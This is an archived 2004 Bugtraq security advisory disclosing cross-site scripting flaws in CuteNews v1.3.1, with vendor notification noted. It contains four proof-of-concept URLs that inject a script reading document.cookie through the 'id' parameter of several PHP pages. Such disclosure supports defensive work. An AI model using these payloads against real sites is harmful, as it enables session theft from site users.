Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos network security services platform







Bugtraq: Cross-Site Scripting CuteNews

Cross-Site Scripting CuteNews

From: DarkBicho <darkbicho_at_fastmail.fm>
Date: Sun, 27 Jun 2004 17:37:12 -0700

http://www.swp-zone.org/archivos/advisory-06.txt

-------------------------------------------------------------------------------------------------

                            :.: Cross-Site Scripting CuteNews :.:

  PROGRAM: CuteNews
  HOMEPAGE: http://cutephp.com/
  VERSION: v1.3.1
  BUG: Cross-Site Scripting
  DATE: 23/05/2004
  AUTHOR: DarkBicho
          web: http://www.darkbicho.tk
          team: Security Wari Proyects <www.swp-zone.org>
          Email: darkbicho_at_peru.com

-------------------------------------------------------------------------------------------------

1.- Affected software description:
    -----------------------------

    CuteNews is a popular News Publishing, written in php by
    CutePHP.

2.- Vulnerabilities:
    ---------------

    A. Cross-Site Scripting aka XSS:

    :.: In Id :
 http://attacker/show_archives.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&ucat=&&archive=&start_from=&ucat=&

http://attacker/show_news.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&ucat=&

http://attacker/example1.php?subaction=showfull&id=<script>alert(document.cookie);</script>

http://attacker/example2.php?subaction=showfull&id=<script>alert(document.cookie);</script>

    
   
3.- SOLUTION:
     จจจจจจจจ
    Vendors were contacted many weeks ago and plan to release a fixed
    version soon.
    Check the CuteNews website for updates and official release details.

4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    "EL PISCO ES Y SERA PERUANO"

5.- Contact
    -------

        WEB: http://www.darkbicho.tk
        EMAIL: darkbicho_at_peru.com

-------------------------------------------------------------------------------------------------
                                ___________ ____________
                               / _____/ \ / \______ \
                               \_____ \\ \/\/ /| ___/
                              / \\ / | |
                             /_______ / \__/\ / |____|
                             \/ \/
                       
                                Security Wari Projects
                                  (c) 2002 - 2004
                                    Made in Peru

----------------------------------------[ EOF
]----------------------------------------------
 
  
  
DarkBicho
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"

---------------------- The End ----------------------
Received on Jun 28 2004

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]